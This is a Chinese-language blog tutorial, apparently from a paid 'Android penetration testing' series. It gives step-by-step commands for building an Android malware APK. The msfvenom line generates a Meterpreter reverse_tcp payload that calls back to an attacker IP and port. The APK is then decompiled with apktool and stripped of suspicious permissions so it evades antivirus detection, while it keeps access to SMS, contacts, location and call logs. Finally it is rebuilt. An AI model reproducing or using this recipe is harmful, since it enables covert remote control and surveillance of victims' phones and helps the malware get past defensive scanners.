【安卓渗透测试系列教程第四期】权限编辑过杀软

admin 2022年5月11日10:50:27移动安全评论9 views2167字阅读7分13秒阅读模式

欢迎回来,安卓渗透继续连载

Pay Your Attention:

受疫情影响,是一段比较好的学习时间,应一些小伙伴要求出一个比较系统的安卓渗透测试教程,本来想无偿的推送给小伙伴们,但

【安卓渗透测试系列教程第四期】权限编辑过杀软

于是,随意打赏页面中所示任意金额即可获取后面所有的安卓渗透教程,教程偏小白,适合入门,教程还未写完,打赏之后记得私聊我,见谅!见谅!见谅

【安卓渗透测试系列教程第四期】权限编辑过杀软

享受这一刻,希望可以帮助到你




首先需要先生成一个安卓有效载荷,使用msfvenom生成

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=4444 > permission.apk

【安卓渗透测试系列教程第四期】权限编辑过杀软

安装APKTool

apt-get install apktool

【安卓渗透测试系列教程第四期】权限编辑过杀软

使用安装好的APKTool对生成的安卓有效载荷进行反编译

apktool d -f permission.apk

【安卓渗透测试系列教程第四期】权限编辑过杀软

查看反编译出来的文件夹,和APK同名

【安卓渗透测试系列教程第四期】权限编辑过杀软

看到有一个名为AndroidManifest.xml的xml文件,里面有相关的权限信息

【安卓渗透测试系列教程第四期】权限编辑过杀软

删掉一些不大需要,不大相关而且比较关键的权限,比如发送短信,录音,写入联系人,设置壁纸之类的

<uses-permission android:name="android.permission.SEND_SMS"/> <uses-permission android:name="android.permission.RECORD_AUDIO"/> <uses-permission android:name="android.permission.SET_WALLPAPER"/> <uses-permission android:name="android.permission.WRITE_CONTACTS"/>

修改完大致如下,注意需要保留写入文件的权限,确保可以上传,下载文件

<uses-permission android:name="android.permission.INTERNET"/>    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE"/>    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE"/>    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION"/>    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION"/>    <uses-permission android:name="android.permission.READ_PHONE_STATE"/>    <uses-permission android:name="android.permission.RECEIVE_SMS"/>    <uses-permission android:name="android.permission.READ_CONTACTS"/>    <uses-permission android:name="android.permission.WRITE_SETTINGS"/>    <uses-permission android:name="android.permission.READ_SMS"/>    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE"/>    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>    <uses-permission android:name="android.permission.READ_CALL_LOG"/>    <uses-permission android:name="android.permission.WAKE_LOCK"/>    <uses-feature android:name="android.hardware.camera"/>    <uses-feature android:name="android.hardware.camera.autofocus"/>    <uses-feature android:name="android.hardware.microphone"/>

修改完成保存文件,删除之前生成的permission文件

rm permission.apk

使用APKTool进行编译

apktool b -f permission/

【安卓渗透测试系列教程第四期】权限编辑过杀软

可以在路径permission/dist中找到编译好的APK文件

【安卓渗透测试系列教程第四期】权限编辑过杀软

尝试杀软检测就不放图片了


免费连载就到这边,可以打赏任意金额获取后续教程




原创不易,帮我点点右下角的“在看”吧,欢迎转发跟同行分享,谢谢

【安卓渗透测试系列教程第四期】权限编辑过杀软

原文始发于微信公众号(Kali渗透测试教程):【安卓渗透测试系列教程第四期】权限编辑过杀软

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月11日10:50:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【安卓渗透测试系列教程第四期】权限编辑过杀软 https://cn-sec.com/archives/971869.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: